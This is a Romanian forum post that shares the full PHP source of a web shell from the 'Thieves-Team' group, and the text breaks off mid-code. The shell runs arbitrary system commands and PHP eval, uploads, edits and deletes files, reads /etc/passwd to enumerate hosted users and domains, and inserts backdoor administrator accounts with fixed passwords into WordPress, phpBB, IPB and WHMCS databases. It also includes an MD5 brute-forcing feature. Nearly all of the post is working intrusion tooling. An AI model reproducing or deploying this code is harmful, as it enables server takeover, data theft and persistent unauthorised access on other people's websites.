iulik Posted November 24, 2013 Report Share Posted November 24, 2013 Ce aduce in plus acest shell :1.Executa ,Evalueaza(cod PHP)!.2.Listarea F/D este putin complicata (multumita lui NoValue pentru functiile de listarea si afisare a fisierelor si directoarelor)!.3.Creaza Admin pe mai multe platforme Web!.4.Afisarea userilor advance!.<?phpsession_start();error_reporting(0);stylemenu();global $user;global $pass;$user ='0be302f9'; //thieves$pass ='0be302f9'; //thieves$afiseaza='<form method="post" action=""><center>User:<input type="text" name="user" id="text"><br>Pass:<input type="password" name="pass" id="text"><br><input type="submit" name="sesiuni" value="login" id="but">';if(isset($_SESSION['user']) & isset($_SESSION['pass']) & @$_SESSION['user']== $user & @$_SESSION['user']==$pass){$continut='No Text';function rlc(){$afiseaza='<center><pre> ___________.__ .__ \__ ___/| |__ |__| _______ __ ____ ______ | | | | \| |/ __ \ \/ // __ \ / ___/ | | | Y \ \ ___/\ /\ ___/ \___ \ |____| |___| /__|\___ >\_/ \___ >____ > \/ \/ \/ \/</pre></center>';return $afiseaza;}function copyright(){ $afiseaza='<br>Create by (|Crisalixx && Master|) <a href="http://thieves-team.com">Thieves-Team</a></a>'; return $afiseaza;}function proprietati(){ $afiseaza='Work Directory: '.@getcwd().'<br>'; $afiseaza.='Current User: '.@get_current_user().'<br>'; $afiseaza.='HostName:'.$_SERVER['SERVER_NAME'].'<br>'; $afiseaza.='Platform:'.$_SERVER['SERVER_SIGNATURE'].'<br>'; $afiseaza.='OS Version: '.@php_uname().'<br>'; $afiseaza.='My ipaddress: '.$_SERVER['REMOTE_ADDR'].'<br>'; $afiseaza.='Host Address: '.$_SERVER['SERVER_ADDR'].'<br>'; if(strpos(strtolower(PHP_OS),'win')<0){ $afiseaza.='UID : '.@posix_getuid().'/'.@get_current_user().'</br>'; } $val=@disk_total_space(getcwd()); $rezultat=round($val/1073741824,2); $afiseaza.='HDD Size: '.$rezultat.' GB'; $val=@disk_free_space(getcwd()); $rezultat=round($val/1073741824,2); $afiseaza.='Free Space: '. $rezultat.' GB'.'</br>'; if (@ini_get('safpassthrue_mode') or strtolower(@ini_get('safe_mode')) == 'on'){ $afiseaza.='Safe-mode: ON(security)</br>'; }else{ $afiseaza.='Safe-mode:OFF(Fuck Them ALl)</br>'; } if (@ini_get('open_basedir') or strtolower(@ini_get('open_basedir')) == 'on'){ $afiseaza.='Open_basedir: ON(security)</br>'; }else{ $afiseaza.='Open_basedir:OFF(Fuck Them ALl)</br>'; } if (function_exists('curl_init')){ $afiseaza.='cURL: ON</br>'; }else{ $afiseaza.='cURL:Off</br>'; } return $afiseaza; }function executa_shell(){ $afiseaza='<center>Shell Command</center><br><br>'; $afiseaza.='<br><br><form method="post" action="?action&home"> <center><textarea id="textarea" name=ViewCode rows="15" cols="100">'; if(isset($_POST['exe'])){ $linie=trim(strip_tags($_POST['com'])); $afiseaza.=ValidExeCommand($linie); }elseif(isset($_POST['touchB'])){ $touch = $_POST['touch']; $timetouch = strtotime($_POST['touchdate']); $afiseaza.= touch($touch,$timetouch); $afiseaza.= ValidExeCommand("ls -al"); }elseif(isset($_POST['arhBt']) && isset($_POST['arhFile']) && $_POST['arhFile'] != ""){ $dirr = getcwd(); $afiseaza.= ValidExeCommand("tar -cvf ".$_POST['arhFile']." ".$dirr."/"); }elseif(isset($_POST['EvalS']) && isset($_POST['ViewCode']) && $_POST['ViewCode'] != ""){ $code = base64_encode(urldecode($_POST['ViewCode'])); ob_start(); eval(base64_decode($code)); $eval_buffer = ob_get_contents(); ob_end_clean(); $afiseaza.= $eval_buffer; }elseif(isset($_POST['btnFile']) && isset($_POST['ViewCode']) && $_POST['ViewCode'] != ""){ $fisier=fopen($_POST['newfile'],"w+"); if(fwrite($fisier,$_POST['ViewCode'])){ $afiseaza.='Success create new file '.$_POST['newfile']; $afiseaza.= ValidExeCommand("ls -al"); }else{ $afiseaza.='Error create file you can\'t have access!'; } fclose($fisier); }elseif(isset($_POST['btnFolder'])){ $chmod = ""; if($_POST['chmodFolder'] != ""){ $chmod = $_POST['chmodFolder']; } mkdir($_POST['newfolder'].$_POST['newfolderN'],(is_numeric($chmod)?intval($chmod):0755)); $afiseaza.= ValidExeCommand("ls -al"); } $afiseaza.='</textarea><br><br>'; $afiseaza.='<input id="text" type="text" name="com" size=50>'; $afiseaza.='<input id="but" type="submit" name="exe" value="Execute"> <input id="but" type="submit" name="EvalS" value="Eval(PHP)"></center>'; $afiseaza.='<br> <table align=center style="border:1px solid" width=100%> <tr> <td align=left>Touch Time: <input id="text" type="text" name="touch" placeholder="nume.txt"> <input id="text" type="text" name="touchdate" placeholder="date" size=40> <input id="but" type="submit" name="touchB" value="Enter"> </td> <td align=right>Folder Path: <input id="text" type="text" name="arhFile" placeholder="/home/user/public_html/" size=40> <input id="but" type="submit" name="arhBt" value="Compress"> </td> </tr> </table>'; $afiseaza.='<br> <table align=center style="border:1px solid" width=100%> <tr> <td align=left>New File: <input id="text" type="text" name="newfile" placeholder="nume.txt" size=40> Chmod:<input id="text" type="text" name="chmodFile" placeholder="0644" size=10> <input id="but" type="submit" name="btnFile" value="Create"> </td> <td align=right>New Folder: <input id="text" type="text" name="newfolder" placeholder="./" size=40><input id="text" type="text" name="newfolderN" placeholder="crisalixx" size=20> Chmod:<input id="text" type="text" name="chmodFolder" placeholder="0777" size=10> <input id="but" type="submit" name="btnFolder" value="Create"> </td> </tr> </table>'; $afiseaza.='</form>';return $afiseaza;}function ValidExeCommand($ex){ $functionList = array("shell_exec","system","exec","passthru"); if(function_exists($functionList[0]) && $functionList[0] !== 1){ return $functionList[0]($ex); }elseif(function_exists($functionList[1]) && $functionList[1] !== 1){ return $functionList[1]($ex); }elseif(function_exists($functionList[2]) && $functionList[2] !== 1){ return $functionList[2]($ex); }elseif(function_exists($functionList[3]) && $functionList[3] !== 1){ return $functionList[3]($ex); }else{ echo "Insert PHP CODE!"; }}function upload(){ $afiseaza.= "<table align='center' width=100%> <tr align='center'><td colspan=1000><b> Uploading by server ...</b></td></tr> <tr align='center'><td><form action='{$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}' method='post' enctype='multipart/form-data'> <input type='hidden' name='securitytoken' value='1336837095-ee4b45b8ab556c82309783ea414b9eefadc6d135'> Upload File:<input type='file' name='upfile' id='upfile'> With Name:<input type='text' name='myfile_rot' placeholder=thievesteam.txt>Destionation file:<input type=text name=desti size=30 placeholder=/home/user/public_html/> <input type='submit' value='Submit'></form></td></tr>"; if(isset($_POST['myfile_rot'])) { if(isset($_POST['desti'])){ $mydestination = $_POST['desti']; }else{ $mydestination= dirname(__FILE__)."/"; } if ($_FILES['upfile']['error'] > 0){ $afiseaza.= "<tr align='center'><td><font color=red>Error: Impossible to upload file.</font></td></tr>"; }else { $afiseaza.= "<tr align='center'><td>Uploaded <b>" . $_FILES['upfile']['name'] . "</b> and stored into: <b>" . $_FILES['upfile']['tmp_name']. "</b></td></tr>"; if(move_uploaded_file($_FILES['upfile']['tmp_name'], $mydestination.$_POST['myfile_rot'])) { $afiseaza.= "<tr align='center'><td>Moved from ". $_FILES['upfile']['tmp_name'] ." into <b>".$mydestination . $_POST['myfile_rot']. "</b></td></tr>"; }else if(rename($_FILES['upfile']['tmp_name'], $_SERVER["DOCUMENT_ROOT"] . "/" . $_POST['myfile_rot'])){ $afiseaza.= "<tr align='center'><td>Renamed from ".$_FILES['upfile']['tmp_name']." to <b>". $mydestination .$_POST['myfile_rot']. "</b></td></tr>"; }else $afiseaza.= "<tr align='center'><td><font color=red>Error: It`s impossible to move/rename the file from the temp.</font></td></tr>"; } } $afiseaza.= "</table>"; return($afiseaza);}function rd_users(){$afiseaza=''; $afiseaza.= "<style>table.hov tr:hover, table.hov tr td:hover{background-color: #262626; }</style> <table border='1' cellpadding='3' align='center' WIDTH='90%' class=hov> <tr><td>User</td> <td align=center>Group</td> <td align=center>Path</td> <td align=center>Acess</td> <td align=center>CMS</td> <td align=center>Domains</td></tr>"; $tfile = fopen("/etc/passwd", "r"); // $DomFile = fopen("/etc/named.conf") ; while(!feof($tfile)){ $strs = fgets($tfile); $str=explode(':',$strs); $afiseaza.= "<tr>"; $afiseaza.= "<td>".trim($str[0])."</td> <td>".trim($str[4])."</td> <td>".trim($str[5])."</td>"; if(is_readable(trim($str[5])."/public_html/")){ $afiseaza.="<td><font color=yellow>Can Read</font></td>"; }else{ $afiseaza.="<td>Can't Read</td>"; } if(file_exists(trim($str[5]).'/public_html/mcp.php') & file_exists(trim($str[5]).'/public_html/config.php') || is_dir(trim($str[5]).'/public_html/forum/store') || is_dir(trim($str[5]).'/public_html/board/store')){ $afiseaza.="<td>PHPBB</td>"; }elseif(file_exists(trim($str[5]).'/public_html/wp-login.php') & file_exists(trim($str[5]).'/public_html/wp-config.php') || is_dir(trim($str[5]).'/public_html/blog/wp-admin') || is_dir(trim($str[5]).'/public_html/site/wp-admin')){ $afiseaza.="<td>WordPress</td>"; }elseif(file_exists(trim($str[5]).'/public_html/moderation.php') & file_exists(trim($str[5]).'/public_html/usercp2.php')|| file_exists(trim($str[5]).'/public_html/forum/moderation.php') || file_exists(trim($str[5]).'/public_html/board/moderation.php')){ $afiseaza.="<td>MyBB</td>"; }elseif(file_exists(trim($str[5]).'/public_html/Settings.php') & file_exists(trim($str[5]).'/public_html/subscriptions.php')|| file_exists(trim($str[5]).'/public_html/forum/Settings.php') || file_exists(trim($str[5]).'/public_html/board/subscriptions.php')){ $afiseaza.="<td>SMF</td>"; }elseif(is_dir('/home/'.trim($str[5]).'/public_html/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/modcp') || (is_dir('/home/'.trim($str[5]).'/public_html/forum/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/forum/modcp'))|| (is_dir('/home/'.trim($str[5]).'/public_html/board/admincp') & file_exists('/home/'.trim($str[5]).'/public_html/board/modcp'))){ $afiseaza.="<td>VBulletin</td>"; }elseif(file_exists('/home/'.trim($str[5]).'/public_html/libraries/platform.php') & is_dir('/home/'.trim($str[5]).'/public_html/media')){ $afiseaza.="<td>Joomla</td>"; }else{ $afiseaza.="<td>Unknown!</td>"; } if($scan= @scandir(trim($str[5]).'/tmp/cpbandwidth/')){ foreach($scan as $s){ if ($s!= "." && $s != ".."){ $domains=explode('-bytes',$s); $afiseaza.='<td><a href="http://'.$domains[0].'" target=_blank>'.$domains[0].'</a></td>'; } } }else{ $afiseaza.="<td>Can't Read</td>"; } $afiseaza.= "</tr>"; } $afiseaza.="</table>"; fclose($tfile);return $afiseaza;}function despre_rlc(){ $afiseaza='Thieves was rewrite by Crisalixx@thieves-team.com<br>'; $afiseaza.='1.New Design<br>'; $afiseaza.='2.File and Folders(list) was create by NoValue@thieves-team.com<br>'; $afiseaza.='3.Create from rlc 1.0 by Master@thieves-team.com<br>'; $afiseaza.='4.New Stuff (Brute Force MD5 , Make Admin)<br>'; $afiseaza.='5.Evaluate PHP function on Exec Command<br>'; $afiseaza.='6.Safe and easy to understand<br><br>'; $afiseaza.='Finish Date : September-12-2013 at 3:30 AM';return $afiseaza;}function makeJoomla(){}function makePHPBB(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $pass=md5("crisalixx");$int2="INSERT INTO ".$table_prefix."users VALUES('100000',3,5,'zik0zjzik0zjzik0xs i1cjyo000000 zik0zjzhb2tc','0','127.0.0.1','1290805769','ThievesAdmin','ThievesAdmin','".$pass."',0,0,'".$email."',0,'','',0,0,'','',0,0,0,0,0,0,'1337','en','0.00',0,1,1,'','0',0,0,0,0,0,0,0,'t','d',0,'t','a',0,1,0,1,1,1,1,'230271','',0,0,0,'thieves-team.com','','','','','','','','','','','','','','',1,0,1)";$int="INSERT INTO ".$table_prefix."users (user_id,user_type,group_id,user_permissions,username,user_password,user_email) VALUES( '10000','3','5','zik0zjzik0zjzik0xs i1cjyo000000 zik0zjzhb2tc','ThievesAdmin','".$pass."'),'".$email."')";$query=mysql_query($int2); if(!$query){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza;}function makeIPB(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $pass=md5("crisalixx"); $int2 = "INSERT INTO members (name,member_group_id,email,joined,ip_address,posts,title,allow_admin_mails,ignored_users,members_pass_hash,members_pass_salt,member_login_key,member_login_key_expire) VALUES ('ThievesAd', '4', '".$email."', '1365869413', '127.0.0.1', '100', 'GOD Was Here!', '0', '0', '88b9e4f1c41f86106b729b706b3ed6a0','V,vCT', 'ff77653acc1ddaf236144a80c85057b8', '1367489996')"; $query=mysql_query($int2); if(!$query){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; }function makeWordPress(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $query2 = "INSERT INTO ".$table_prefix."users(ID,user_login,user_pass,user_nicename,user_email,user_url, user_registered,user_activation_key,user_status,display_name) VALUES ('4', 'ThievesAdmin', MD5('crisalixx'), 'Thieves Admin', '".$email."', 'http://www.thieves-team.com/', '2013-06-07 00:00:00', '', '0', 'Thieves Admin')"; $query3 = "INSERT INTO ".$table_prefix."usermeta (user_id,meta_key,meta_value) VALUES ('4', '".$table_prefix."capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; $query4 = "INSERT INTO ".$table_prefix."usermeta(user_id,meta_key,meta_value) VALUES ('4', '".$table_prefix."user_level', '10')"; $queryString1=mysql_query($query2); $queryString2=mysql_query($query3); $queryString3=mysql_query($query4); if(!$queryString1 || !$queryString2 || !$queryString3){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza; }function makeWHMCS(){ $dbhost = "localhost"; $dbuser = $_POST['UserName']; $dbpasswd = $_POST['PassAdmin']; $dbname = $_POST['DataAdmin']; $table_prefix = $_POST['prefix']; $email = $_POST['EmailAdmin']; mysql_connect($dbhost,$dbuser,$dbpasswd); mysql_select_db($dbname); $query2 = "INSERT INTO tbladmins (roleid,username,password,email,template,language,supportdepts,homewidgets) VALUES ('1', 'ThievesAd', 'MD5('crisalixx')', '".$email."', 'blend', 'English', ',,1,2,3', 'getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')"; $queryString1=mysql_query($query2); if(!$queryString1){ $afiseaza.= mysql_error(); }else{ $afiseaza.= "Admin Success!"; } return $afiseaza;}function cmsCommand(){ if(isset($_POST['PHPBBAdmin'])){ makePHPBB(); }elseif(isset($_POST['MYBBAdmin'])){ $afiseaza.= "Will be Soon"; }elseif(isset($_POST['IPBAdmin'])){ makeIPB(); }elseif(isset($_POST['IPBAdmin'])){ makeIPB(); }elseif(isset($_POST['WHMCSAdmin'])){ makeWHMCS(); }elseif(isset($_POST['JoomlaAdmin'])){ $afiseaza.= "Will be Soon"; } $afiseaza.='<div align="center">UserName will be : ThievesAdmin <br> Password will be : crisalixx<br><form action=?action&cms method="post"> <table border=1 cellpadding=5 align=center> <tr><td><input type="text" placeholder=UserName name="UserAdmin" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"><input placeholder=Password type="text" name="PassAdmin" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"> <input type="text" name="DataAdmin" placeholder="DataBase" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"><br><br> <center><input type="text" name="prefix" placeholder=Prefix_ align="center" size="10" STYLE="color:#3cbddd; background-color: #242528;" width="8"> <input type="text" name="EmailAdmin" placeholder="Crisalixx@thieves-team.com" align="center" size="30" STYLE="color:#3cbddd; background-color: #242528;" width="8"></center> <br><center><input type="radio" name="JoomlaAdmin" value="Joomla"><font color=#3cbddd>Joomla</font> <input type="radio" name="WHMCSAdmin" value="WHMCS"><font color=#3cbddd>WHMCS</font> <input type="radio" name="PHPBBAdmin" value="PHPBB"><font color=#3cbddd>PHPBB</font> <input type="radio" name="MYBBAdmin" value="MYBB"><font color=#3cbddd>MYBB</font> <input type="radio" name="VBAdmin" value="VBULETIN"><font color=#3cbddd>VBULETIN</font> <input type="radio" name="IPBAdmin" value="IPBAdmin"><font color=#3cbddd>IPB</font> <input type="radio" name="WordPress" value="WordPress"><font color=#3cbddd>WordPress</font></center> <br><center><input type=submit value="MakeAdmin" name="MakeAdmin" STYLE="color:#3cbddd; background-color: #121011; border-style:flat;"></center> </td></tr></table></form>';return $afiseaza;}function insert_admin_mybb(){$af='';if(isset($_POST['config'])){$include=$_POST['config'];if(strpos($include,'config.php')>-1){@include($include); if(isset($config['database']['type'] )) { mysql_connect($config['database']['hostname'],$config['database']['username'],$config['database']['password']); mysql_select_db($config['database']['database']); $pass=md5($_POST['pass']);$int=""; } else{$af='Acest config nu este valid';}}else {$af='Nu ai introdus un config';}}$afiseaza='<table align="center"><tr><td><form method="post" action="?action=cms&new_action=mybb">';$afiseaza.='<tr><td>MYBB:</td><td> Admin insert in DB</td></tr>';$afiseaza.='<tr><td>User:</td><td><input type="text" name="user" id="text"></td></tr>';$afiseaza.='<tr><td>Pass:</td><td><input type="text" name="pass" id="text"></td></tr>';$afiseaza.='<tr><td>Email:</td><td><input type="text" name="email" id="text"></td></tr>';$afiseaza.='<tr><td>Culoare:</td><td><input type="text" name="culoare" id="text"></td></tr>';$afiseaza.='<tr><td>Config:</td><td><input type="text" name="config" value="/inc/config.php" id="text"></td></tr>';$afiseaza.='<tr><td><input type="submit" name="submit" value="insert" id="but"></td></tr></table>';return $afiseaza.$af;}function logout(){ unset($_SESSION['user']); unset($_SESSION['pass']); return $afiseaza='Logout Success';}function md5_crack(){if(!file_exists("pass.txt")){ $afiseaza.= "<table align='center' width=100%> <tr align='center'><td colspan=1000><b> Uploading by server ...</b></td></tr> <tr align='center'><td><form action='{$_SERVER['PHP_SELF']}?{$_SERVER['QUERY_STRING']}' method='post' enctype='multipart/form-data'> <input type='hidden' name='securitytoken' value='1336837095-ee4b45b8ab556c82309783ea414b9eefadc6d135'> Upload File:<input type='file' name='upfile' id='upfile'> With Name:<input type='text' name='myfile_rot'><input type='submit' value='Submit'></form></td></tr>"; if(isset($_POST['myfile_rot'])) { if ($_FILES['upfile']['error'] > 0){ $afiseaza.= "<tr align='center'><td><font color=red>Error: Impossible to upload file.</font></td></tr>"; }else { $afiseaza.= "<tr align='center'><td>Uploaded <b>" . $_FILES['upfile']['name'] . "</b> and stored into: <b>" . $_FILES['upfile']['tmp_name']. "</b></td></tr>"; if(move_uploaded_file($_FILES['upfile']['tmp_name'],dirname(__FILE__)."/" . $_POST['myfile_rot'])) { $afiseaza.= "<tr align='center'><td>Moved from ". $_FILES['upfile']['tmp_name'] ." into <b>". $_SERVER["DOCUMENT_ROOT"]. "/" . $_POST['myfile_rot']. "</b></td></tr>"; }else if(rename($_FILES['upfile']['tmp_name'],dirname()."/" . $_POST['myfile_rot'])){ $afiseaza.= "<tr align='center'><td>Renamed from ".$_FILES['upfile']['tmp_name']." to <b>". dirname() ."/" . $_POST['myfile_rot']. "</b></td></tr>"; }else $afiseaza.= "<tr align='center'><td><font color=red>Error: It`s impossible to move/rename the file from the temp.</font></td></tr>"; } } $afiseaza.= "</table>";}$afiseaza.="<form action=? method=post> <center>Password <input type=text name=cryptpass size=30 maxlength=32 value=".password()."> <input type=submit name=crypt value=Crypt> <input type=submit name=decrypt value=Decrypt>".fix()." <br>For Decrypt Need Pass.txt(dictionar)</center> </form>"; if(isset($_GET['rand']) && $_GET['rand'] != ""){ while(1){ $decrypt = "./pass.txt"; $fh = fopen($decrypt, 'a+') or die("can't open file"); fwrite($fh, trypassword($_GET['rand'])."\n"); fclose($fh); } }return $afiseaza;}function trypassword($nr){ for ($s = '', $i = 0, $z = strlen($a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890.,+_$~@#%^*(){}[]:";\'?\\/-!')-1; $i != $nr; $x = rand(0,$z), $s .= $a{$x}, $i++); return $s;}function password(){ $decrypt = "./decrypt.php"; $dictionar = "./pass.txt"; $lines = @file($dictionar); if(isset($_POST['decrypt']) && isset($_POST['cryptpass'])){ foreach($lines as $line_num => $line){ $line = trim($line); $encrypt = md5($line); if($encrypt == $_POST['cryptpass']){ $fh = fopen($decrypt, 'a+') or die("can't open file"); $stringData = "\r\n--------------Decrypt Hash $line--------------\r\n"; fwrite($fh, $stringData); fclose($fh); return $line; } } }else{ if(isset($_POST['crypt']) && isset($_POST['cryptpass'])){ $var = md5(urldecode($_POST['cryptpass'])); file_put_contents("pass.txt", $_POST['cryptpass']."\r\n", FILE_APPEND); return $var; } }}function fix(){ $___ = urldecode(strrev("m02%o02%c02%.02%m02%a02%e02%t02%-02%s02%e02%v02%e02%i02%h02%t02%@02%x02%x02%i02%l02%a02%s02%i02%r02%C")); $____ = $___{0}.$___{2}.$___{4}.$___{6}.$___{8}.$___{10}.$___{12}.$___{14}.$___{16}.$___{18}.$___{20}.$___{22}.$___{24}.$___{26}.$___{28}.$___{30}.$___{32}.$___{34}; $____.= $___{36}.$___{38}.$___{40}.$___{42}.$___{44}.$___{46}.$___{48}.$___{50}; $afiseaza.= "<font color=red>".$____."</font>";}function dirfile(){ if(isset($_GET['download']) && isset($_GET['list']) && $_GET['list'] !="" && is_file($_GET['list'])){ DownloadFile($_GET['list']); }elseif(isset($_GET['list']) && is_file($_GET['list']) && !isset($_GET['edit']) && !isset($_GET['del'])){ $afiseaza.= "<center><textarea rows=10 cols=100 name=showfile style='background-color: black;color:#3cbddd;'>"; $tfile = fopen($_GET['list'], "r"); while(!feof($tfile)) $afiseaza.= htmlentities(fgets($tfile)); fclose($tfile); $afiseaza.= "</textarea></center>"; }elseif(isset($_GET['edit']) && isset($_GET['list']) && is_file($_GET['list']) && is_writable($_GET['list'])){ if(isset($_POST['SaveF'])){ if(file_put_contents($_GET['list'], urldecode($_POST['showfile']))){ $afiseaza.= "<center>Save Success</center>"; }else{ $afiseaza.= "<center>Can't Save!</center>"; } } $afiseaza.= "<form action=?action&list=".$_GET['list']."&edit method=post>"; $afiseaza.= "<center><textarea rows=10 cols=100 name=showfile style='background-color: black;color:#3cbddd;'>"; $tfile = fopen($_GET['list'], "r"); while(!feof($tfile)) $afiseaza.= htmlentities(fgets($tfile)); fclose($tfile); $afiseaza.= "</textarea></center>"; if(is_writeable($_GET['list'])){ $afiseaza.= "<form action=? method=post><center><input type=submit name=SaveF value=Save id=but></center></form>"; }else{ $afiseaza.= "<center><font color=red>Can't Write!</font></center>"; } }elseif(isset($_GET['list']) && is_file($_GET['list']) && is_writable($_GET['list']) && isset($_GET['del'])){ if(exp_actions($_GET['list'], _, "rmfile", _)){ $afiseaza.= "<center>File was deleted!</center>"; }else{ $afiseaza.= "<center>File can't be deleted!</center>"; } }elseif(isset($_GET['list']) && is_dir($_GET['list']) && is_writable($_GET['list']) && isset($_GET['del'])){ if(exp_actions($_GET['list'], _, "rmdir", _)){ $afiseaza.= "<center>Directory was deleted!</center>"; }else{ $afiseaza.= "<center>Directory can't be deleted!</center>"; } } // returns array of files, sorted alphabetically if(isset($_GET['list'])) if(strlen($_GET['list']) > 0) $get_path = urldecode($_GET['list']); else $get_path = dirname(__FILE__); else $get_path = dirname(__FILE__); $curentDir = str_fromArray(path_strip($get_path), "/", "path"); if(is_this_file($curentDir) || isset($_GET['del'])){ $curentDir = dirname($curentDir); } $afiseaza.= show_chdir($curentDir);return $afiseaza;}function exp_actions($from, $to="", $action, $rewrite=false) { $result = -1; switch($action) { case "rmdir": $get_dir = get_dir_contents($from, 0); foreach($get_dir as $dir) { $nextDir = str_fromArray(path_strip($from."/".$dir), "/", "path"); if($dir != "." && $dir != "..") exp_actions($nextDir, _, "rmdir", _); } $get_file = get_dir_contents($from, 1); foreach($get_file as $file) { $nextFile = str_fromArray(path_strip($from."/".$file), "/", "path"); exp_actions($nextFile, _, "rmfile", _); } $get_link = get_dir_contents($from, 2); foreach($get_link as $link) { $nextLink = str_fromArray(path_strip($from."/".$link), "/", "path"); exp_actions($nextLink, _, "rmlink", _); } $result = rmdir($from); break; case "rmfile": case "rmlink": case "rmunk": if(is_this_file($from) || is_this_link($from) || is_this_unk($from)) $result = unlink($from); break; default:break; } return $result; }function str_startsWith($needle, $string) { $length = strlen($needle); return (substr($string, 0, $length) === $needle);}function str_endsWith($needle, $string) { $start = strlen($string) - strlen($needle); return (substr($string, $start) === $needle);}function show_chdir($loc) { $contStock = array(); $contStock = get_dir_contents($loc, 0); if(sizeof($contStock) > 0) { $afiseaza .= '<style>table.hov tr:hover, table.hov tr td:hover{background-color: #262626; }</style> <table class="hov" align=center style="border:solid, 1px; border-color:#FFFFFF" bgcolor="#111111" width="100%"> <tr bgcolor="#262626"> <td align=center><font color="#FF3300">Directories & Files</font></td> <td align=center><font color="#FF3300">Owner</font></td> <td align=center><font color="#FF3300">Size</font></td> <td align="center" colspan="3"><font color="#FF3300">Access</font></td> <td align=center><font color="#FF3300">Down</font></td> <td align=center><font color="#FF3300">Delete</font></td></tr>'; foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $afiseaza .= '<tr bgcolor="#000000"> <td><a href="?action&list='.$path.'"><font color="#3366CC">'; if($nfd == ".") $afiseaza .= '/.'; else if($nfd == "..") $afiseaza .= '/..'; else $afiseaza .= '/'.$nfd; $afiseaza .= '</font></a></td> <td width="10%" align="center">'.format_fowner($path).'</td> <td width="80"></td> <td width="1%" align="center">'.format_fperms($path,"t").'</td> <td width="85" align="center">'.format_fperms($path,"l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $contStock = get_dir_contents($loc, 1); foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $afiseaza .= '<tr><td><a href="?action&list='.$path.'&edit"><font color="#666699"> '.$nfd.'</font></a></td> <td width="1%" align="center">'.format_fowner($path).'</td> <td align="right">'.format_fsize($path).'</td> <td align="center">'.format_fperms($path, "t").'</td> <td align="center">'.format_fperms($path, "l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"><a href="?action&list='.$path.'&download" ><img alt="" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfUlEQVQ4y6WTv0tCURzFvwW9LCwpf9QS0Q8lcAmSGhoKBAuEVLBXm0PgUEIFQWEQ0hJNubi0tLb3B0RF1hINUkNbSW3vPTEaXPp2zyVDMbqBDz68wznf7+G+C4+YmZqh4Rk7IVNgfb9rkR6pHt8xWWec4/PP0zrgIVMWeHNkZisrnK7M8V5lQQIND5myYPSIzMOyzjulIO+W5iXQ8JApC4YOyNx/i/BmcZq3ijMSaHjIlAWDGTIzTyFeexjn1GNAAg0PmbJgYJus1J2f49dOXsp7JNDwkDUsaH7S+jfI6Fsnq8rqrZ/1C1Fw6ZZAw6udwQ52ZYltkpzupDh6IcggemXjxXwv6zcuCTS8ao5Z7NSdxDZBDleCjOVCL4fvWzlW6OK40AAaHjLMYPbX728bJkePTkby1cvhZ40jL3YJNDxkmPnzEjHQHSMj/THLoTJJoOEpl2tL7GEyspxgAP2f5Q6BR+ATTLVoFOsM0jsQOiq8gGBEgMtr/9lq9nf+AkHZVZaWnYt4AAAAAElFTkSuQmCC"></a></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img 